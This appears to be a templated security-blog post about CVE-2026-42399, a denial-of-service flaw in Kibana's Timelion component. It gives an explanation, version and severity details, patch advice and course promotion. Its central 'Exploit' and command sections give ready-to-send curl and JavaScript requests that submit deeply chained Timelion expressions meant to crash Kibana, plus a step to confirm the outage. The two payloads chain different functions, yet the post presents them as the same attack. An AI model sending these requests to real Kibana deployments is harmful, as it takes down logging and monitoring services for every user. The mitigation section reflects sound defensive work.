Listen to this Post
Intro: How CVE-2026-42399 Works
CVE-2026-42399 is a denial-of-service (DoS) vulnerability in Kibana’s Timelion visualization component, stemming from uncontrolled resource consumption (CWE-400). An authenticated attacker with low-privileged access can craft a malicious Timelion expression containing deeply nested, chained function calls. When the Kibana server parses and evaluates this expression, it triggers an algorithmic flaw that causes the internal data structure to grow exponentially rather than linearly. Each chained function call forces the parser to recursively copy and expand the underlying series data objects, leading to a cascading memory allocation pattern. With sufficient chain depth, the memory footprint doubles or triples with each additional function, quickly exhausting the available heap space. This uncontrolled memory consumption causes the Kibana Node.js process to exceed its memory limit, triggering an out-of-memory (OOM) crash. The Kibana service becomes completely unavailable to all users, requiring a manual restart of the service or container to restore functionality. The vulnerability is classified as a flaw in input validation and algorithmic complexity, as the Timelion parser fails to implement any depth limits or recursion guards for function chains. Attackers can repeatedly submit such payloads, forcing the service into a crash loop and effectively creating a persistent denial-of-service condition. The CVSS v3.1 base score is 6.5 (Medium) with the vector string AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, reflecting the network attack vector, low attack complexity, low privileges required, and high availability impact.
DailyCVE Form:
Platform: Elastic Kibana
Version: 8.0.0-8.19.15, 9.0.0-9.3.4
Vulnerability: Exponential memory exhaustion
Severity: Medium (CVSS 6.5)
date: 2026-05-28
Prediction: 2026-06-04
What Undercode Say:
Check Kibana version
curl -s -u username:password "http://kibana-host:5601/api/status" | jq '.version.number'
Monitor memory usage before exploit
free -h && ps aux --sort=-%mem | head -10
Crash Kibana with deep chain (requires authenticated session)
curl -X POST "http://kibana-host:5601/api/timelion/run" \
-H "kbn-xsrf: true" \
-H "Authorization: Basic $(echo -n 'user:pass' | base64)" \
-H "Content-Type: application/json" \
-d '{"expression":".es().chain().chain().chain().chain().chain().chain().chain().chain().chain().chain().chain()"}'
Verify DoS - service should be unresponsive
curl -I "http://kibana-host:5601/app/kibana"
Exploit:
// Crafted Timelion expression causing exponential memory growth
// Chain length > 50 leads to OOM crash within seconds
const maliciousExpr = '.es(index="logs-").label("base")' +
Array(60).fill('.derivative()').join('') +
'.multiply(2)';
// POST to /api/timelion/run with valid session cookie
fetch('/api/timelion/run', {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'kbn-xsrf': 'true' },
body: JSON.stringify({ expression: maliciousExpr, interval: '1y' })
});
Protection:
Apply patches: upgrade to Kibana 8.19.16 or 9.3.5 where Elastic introduced depth limiting and recursion guards in the Timelion expression parser. If immediate upgrade is not possible, disable the Timelion feature entirely or restrict access to the Timelion endpoint via network-level access controls. Implement rate limiting on authenticated API requests to reduce blast radius. Monitor memory usage and set aggressive resource limits (e.g., `–max-old-space-size=512` for Node.js) to contain impact.
Impact:
Successful exploitation allows an authenticated low-privileged user to crash the entire Kibana service, causing a complete denial of service for all users. The attack requires no special privileges beyond basic login access and can be executed remotely via a single HTTP request. Repeated exploitation can keep the service in a crash loop, effectively bricking the Kibana instance until manual intervention. This disrupts all dependent logging, monitoring, and analytics workflows that rely on Kibana as the primary visualization and management interface for Elasticsearch clusters.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

